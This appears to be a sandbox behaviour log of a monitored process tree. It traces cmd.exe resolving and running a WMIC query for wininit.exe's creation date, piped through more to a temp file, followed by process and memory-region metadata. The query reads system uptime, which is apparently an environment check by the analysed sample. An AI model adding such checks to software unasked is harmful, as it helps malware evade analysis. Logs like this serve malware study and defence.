[0400.028] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.028] GetLastError () returned 0x2
[0400.028] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.029] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*" (normalized: "c:\\windows\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.029] GetLastError () returned 0x2
[0400.029] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC" (normalized: "c:\\windows\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.029] GetLastError () returned 0x2
[0400.029] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.030] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*" (normalized: "c:\\windows\\system32\\wbem\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0x3ca3f0
[0400.030] GetProcessHeap () returned 0x3b0000
[0400.030] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x28) returned 0x3c47e0
[0400.030] FindClose (in: hFindFile=0x3ca3f0 | out: hFindFile=0x3ca3f0) returned 1
[0400.031] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM" (normalized: "c:\\windows\\system32\\wbem\\wmic.com"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.031] GetLastError () returned 0x2
[0400.031] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0x3ca3f0
[0400.031] GetProcessHeap () returned 0x3b0000
[0400.031] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c47e0, Size=0x8) returned 0x3ca450
[0400.031] FindClose (in: hFindFile=0x3ca3f0 | out: hFindFile=0x3ca3f0) returned 1
[0400.031] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0400.031] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0400.032] GetProcessHeap () returned 0x3b0000
[0400.032] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x28) returned 0x3c47e0
[0400.032] GetProcessHeap () returned 0x3b0000
[0400.032] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x218) returned 0x3cf300
[0400.032] GetProcessHeap () returned 0x3b0000
[0400.032] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x82) returned 0x3cf520
[0400.032] SetErrorMode (uMode=0x0) returned 0x0
[0400.032] SetErrorMode (uMode=0x1) returned 0x0
[0400.033] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3cf5c0, lpFilePart=0x22f560 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22f560*="system32") returned 0x13
[0400.033] SetErrorMode (uMode=0x0) returned 0x1
[0400.033] GetProcessHeap () returned 0x3b0000
[0400.033] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3cf5b0, Size=0x42) returned 0x3cf5b0
[0400.033] GetProcessHeap () returned 0x3b0000
[0400.033] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3cf5b0) returned 0x42
[0400.033] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0400.033] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0400.033] GetProcessHeap () returned 0x3b0000
[0400.033] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1ce) returned 0x3cf610
[0400.033] GetProcessHeap () returned 0x3b0000
[0400.033] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x38c) returned 0x3cf7f0
[0400.034] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3cf7f0, Size=0x1d0) returned 0x3cf7f0
[0400.034] GetProcessHeap () returned 0x3b0000
[0400.034] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3cf7f0) returned 0x1d0
[0400.034] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0400.034] GetProcessHeap () returned 0x3b0000
[0400.034] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe8) returned 0x3cf9d0
[0400.034] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3cf9d0, Size=0x7e) returned 0x3cf9d0
[0400.034] GetProcessHeap () returned 0x3b0000
[0400.034] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3cf9d0) returned 0x7e
[0400.034] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.034] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.035] GetLastError () returned 0x2
[0400.035] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.035] GetLastError () returned 0x2
[0400.035] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.035] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.036] GetLastError () returned 0x2
[0400.036] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.036] GetLastError () returned 0x2
[0400.036] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.036] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.037] GetLastError () returned 0x2
[0400.037] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.037] GetLastError () returned 0x2
[0400.037] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.037] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*" (normalized: "c:\\windows\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.038] GetLastError () returned 0x2
[0400.038] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC" (normalized: "c:\\windows\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.038] GetLastError () returned 0x2
[0400.038] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.038] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*" (normalized: "c:\\windows\\system32\\wbem\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0x3ca3f0
[0400.038] FindClose (in: hFindFile=0x3ca3f0 | out: hFindFile=0x3ca3f0) returned 1
[0400.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM" (normalized: "c:\\windows\\system32\\wbem\\wmic.com"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0xffffffffffffffff
[0400.039] GetLastError () returned 0x2
[0400.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0x3ca3f0
[0400.039] FindClose (in: hFindFile=0x3ca3f0 | out: hFindFile=0x3ca3f0) returned 1
[0400.039] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0400.039] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0400.039] GetConsoleTitleW (in: lpConsoleTitle=0x22f820, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0400.040] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f5d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f598 | out: lpAttributeList=0x22f5d8, lpSize=0x22f598) returned 1
[0400.040] UpdateProcThreadAttribute (in: lpAttributeList=0x22f5d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f588, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f5d8, lpPreviousValue=0x0) returned 1
[0400.040] GetStartupInfoW (in: lpStartupInfo=0x22f6f0 | out: lpStartupInfo=0x22f6f0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0400.040] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1
[0400.043] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC PROCESS where name=\"wininit.exe\" get creationdate ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x22f610*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="WMIC PROCESS where name=\"wininit.exe\" get creationdate ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f5c0 | out: lpCommandLine="WMIC PROCESS where name=\"wininit.exe\" get creationdate ", lpProcessInformation=0x22f5c0*(hProcess=0x64, hThread=0x5c, dwProcessId=0xdec, dwThreadId=0xdf0)) returned 1
[0400.052] CloseHandle (hObject=0x5c) returned 1
[0400.052] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0400.053] GetProcessHeap () returned 0x3b0000
[0400.053] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c8fb0 | out: hHeap=0x3b0000) returned 1
[0400.053] GetEnvironmentStringsW () returned 0x3c8fb0*
[0400.053] GetProcessHeap () returned 0x3b0000
[0400.053] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb78) returned 0x3cfe40
[0400.053] memcpy (in: _Dst=0x3cfe40, _Src=0x3c8fb0, _Size=0xb78 | out: _Dst=0x3cfe40) returned 0x3cfe40
[0400.053] FreeEnvironmentStringsW (penv=0x3c8fb0) returned 1
[0400.053] GetProcessHeap () returned 0x3b0000
[0400.053] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3ca470 | out: hHeap=0x3b0000) returned 1
[0400.053] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f5d8 | out: lpAttributeList=0x22f5d8)
[0400.053] _get_osfhandle (_FileHandle=3) returned 0x58
[0400.053] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x58, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1
[0400.053] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0
[0400.054] _close (_FileHandle=5) returned 0
[0400.055] _dup (_FileHandle=0) returned 4
[0400.056] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0
[0400.057] _close (_FileHandle=3) returned 0
[0400.058] SetErrorMode (uMode=0x0) returned 0x0
[0400.059] SetErrorMode (uMode=0x1) returned 0x0
[0400.059] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3c8fc0, lpFilePart=0x22f7d0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22f7d0*="system32") returned 0x13
[0400.059] SetErrorMode (uMode=0x0) returned 0x1
[0400.059] GetProcessHeap () returned 0x3b0000
[0400.059] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c8fb0, Size=0x42) returned 0x3c8fb0
[0400.059] GetProcessHeap () returned 0x3b0000
[0400.059] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c8fb0) returned 0x42
[0400.059] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0400.059] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0400.060] GetProcessHeap () returned 0x3b0000
[0400.060] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1ce) returned 0x3c5ea0
[0400.060] GetProcessHeap () returned 0x3b0000
[0400.060] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x38c) returned 0x3c9010
[0400.060] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c9010, Size=0x1d0) returned 0x3c9010
[0400.060] GetProcessHeap () returned 0x3b0000
[0400.060] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c9010) returned 0x1d0
[0400.060] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0400.060] GetProcessHeap () returned 0x3b0000
[0400.060] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe8) returned 0x3c91f0
[0400.060] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c91f0, Size=0x7e) returned 0x3c91f0
[0400.060] GetProcessHeap () returned 0x3b0000
[0400.060] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c91f0) returned 0x7e
[0400.061] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.061] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.*" (normalized: "c:\\windows\\system32\\more.*"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0x3c6080
[0400.061] FindClose (in: hFindFile=0x3c6080 | out: hFindFile=0x3c6080) returned 1
[0400.061] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.COM" (normalized: "c:\\windows\\system32\\more.com"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0x3c6080
[0400.062] FindClose (in: hFindFile=0x3c6080 | out: hFindFile=0x3c6080) returned 1
[0400.062] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1
[0400.062] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2
[0400.062] _get_osfhandle (_FileHandle=1) returned 0x7
[0400.062] _get_osfhandle (_FileHandle=1) returned 0x7
[0400.062] _get_osfhandle (_FileHandle=1) returned 0x7
[0400.062] GetFileType (hFile=0x7) returned 0x2
[0400.063] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0400.063] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f7e8 | out: lpMode=0x22f7e8) returned 1
[0400.064] _dup (_FileHandle=1) returned 3
[0400.105] _close (_FileHandle=1) returned 0
[0400.106] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", _String2="con") returned -53
[0400.106] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22f798, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58
[0400.109] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 1
[0400.109] GetProcessHeap () returned 0x3b0000
[0400.109] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x218) returned 0x3c9280
[0400.110] GetProcessHeap () returned 0x3b0000
[0400.110] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1e) returned 0x3c4870
[0400.110] SetErrorMode (uMode=0x0) returned 0x0
[0400.110] SetErrorMode (uMode=0x1) returned 0x0
[0400.110] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3c94b0, lpFilePart=0x22f560 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22f560*="system32") returned 0x13
[0400.110] SetErrorMode (uMode=0x0) returned 0x1
[0400.110] GetProcessHeap () returned 0x3b0000
[0400.110] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c94a0, Size=0x42) returned 0x3c94a0
[0400.110] GetProcessHeap () returned 0x3b0000
[0400.111] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c94a0) returned 0x42
[0400.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0400.111] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0400.111] GetProcessHeap () returned 0x3b0000
[0400.111] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1ce) returned 0x3c9500
[0400.111] GetProcessHeap () returned 0x3b0000
[0400.111] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x38c) returned 0x3c96e0
[0400.111] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c96e0, Size=0x1d0) returned 0x3c96e0
[0400.111] GetProcessHeap () returned 0x3b0000
[0400.111] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c96e0) returned 0x1d0
[0400.111] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0400.111] GetProcessHeap () returned 0x3b0000
[0400.111] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe8) returned 0x3c98c0
[0400.112] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c98c0, Size=0x7e) returned 0x3c98c0
[0400.112] GetProcessHeap () returned 0x3b0000
[0400.112] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c98c0) returned 0x7e
[0400.112] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.112] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.*" (normalized: "c:\\windows\\system32\\more.*"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0x3c6080
[0400.112] FindClose (in: hFindFile=0x3c6080 | out: hFindFile=0x3c6080) returned 1
[0400.112] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.COM" (normalized: "c:\\windows\\system32\\more.com"), fInfoLevelId=0x1, lpFindFileData=0x22f2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f2d0) returned 0x3c6080
[0400.113] FindClose (in: hFindFile=0x3c6080 | out: hFindFile=0x3c6080) returned 1
[0400.113] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1
[0400.113] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2
[0400.113] GetConsoleTitleW (in: lpConsoleTitle=0x22f820, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0400.113] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f5d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f598 | out: lpAttributeList=0x22f5d8, lpSize=0x22f598) returned 1
[0400.113] UpdateProcThreadAttribute (in: lpAttributeList=0x22f5d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f588, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f5d8, lpPreviousValue=0x0) returned 1
[0400.113] GetStartupInfoW (in: lpStartupInfo=0x22f6f0 | out: lpStartupInfo=0x22f6f0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0400.114] lstrcmpW (lpString1="\\more.com", lpString2="\\XCOPY.EXE") returned -1
[0400.114] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\more.com", lpCommandLine="more ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x22f610*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="more ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f5c0 | out: lpCommandLine="more ", lpProcessInformation=0x22f5c0*(hProcess=0x6c, hThread=0x5c, dwProcessId=0xde8, dwThreadId=0xd4c)) returned 1
[0400.135] CloseHandle (hObject=0x5c) returned 1
[0400.136] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0400.136] GetProcessHeap () returned 0x3b0000
[0400.136] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cfe40 | out: hHeap=0x3b0000) returned 1
[0400.136] GetEnvironmentStringsW () returned 0x3cfe40*
[0400.136] GetProcessHeap () returned 0x3b0000
[0400.136] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb78) returned 0x3d49e0
[0400.136] memcpy (in: _Dst=0x3d49e0, _Src=0x3cfe40, _Size=0xb78 | out: _Dst=0x3d49e0) returned 0x3d49e0
[0400.136] FreeEnvironmentStringsW (penv=0x3cfe40) returned 1
[0400.139] GetProcessHeap () returned 0x3b0000
[0400.139] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3ca470 | out: hHeap=0x3b0000) returned 1
[0400.139] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f5d8 | out: lpAttributeList=0x22f5d8)
[0400.139] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0400.141] _close (_FileHandle=3) returned 0
[0400.142] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0
[0400.143] _close (_FileHandle=4) returned 0
[0400.144] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0
[0407.533] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x22faf8 | out: lpExitCode=0x22faf8*=0x0) returned 1
[0407.533] CloseHandle (hObject=0x64) returned 1
[0407.534] WaitForSingleObject (hHandle=0x6c, dwMilliseconds=0xffffffff) returned 0x0
[0407.534] GetExitCodeProcess (in: hProcess=0x6c, lpExitCode=0x22faf8 | out: lpExitCode=0x22faf8*=0x0) returned 1
[0407.534] CloseHandle (hObject=0x6c) returned 1
[0407.534] _get_osfhandle (_FileHandle=1) returned 0x7
[0407.534] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0407.535] _get_osfhandle (_FileHandle=1) returned 0x7
[0407.535] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a65e194 | out: lpMode=0x4a65e194) returned 1
[0407.536] _get_osfhandle (_FileHandle=0) returned 0x3
[0407.536] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a65e198 | out: lpMode=0x4a65e198) returned 1
[0407.537] SetConsoleInputExeNameW () returned 0x1
[0407.537] GetConsoleOutputCP () returned 0x1b5
[0407.537] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a66bfe0 | out: lpCPInfo=0x4a66bfe0) returned 1
[0407.537] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0407.539] exit (_Code=0)
Process:
id = "19"
image_name = "wmic.exe"
filename = "c:\\windows\\system32\\wbem\\wmic.exe"
page_root = "0x25654000"
os_pid = "0xdec"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "18"
os_parent_pid = "0xdd4"
cmd_line = "WMIC PROCESS where name=\"wininit.exe\" get creationdate "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2423
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2424
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2425
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2426
start_va = 0xf0000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2427
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2428
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2429
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
